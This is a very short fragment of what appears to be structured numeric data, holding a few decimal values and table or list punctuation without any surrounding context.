"0.5864218"
] |
0.86468154
|
1
|